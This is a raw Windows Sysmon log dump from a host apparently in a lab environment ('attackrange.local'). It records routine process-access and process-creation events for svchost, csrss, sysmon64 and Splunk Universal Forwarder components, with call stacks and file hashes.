13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9361-6005-D104-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9361-6005-D104-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-9361-6005-D104-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9362-6005-D204-00000000A301}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9362-6005-D204-00000000A301}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9362-6005-D204-00000000A301}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-9362-6005-D204-00000000A301}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.138{59A5CD1D-9363-6005-D304-00000000A301}2672940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9363-6005-D304-00000000A301}2672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
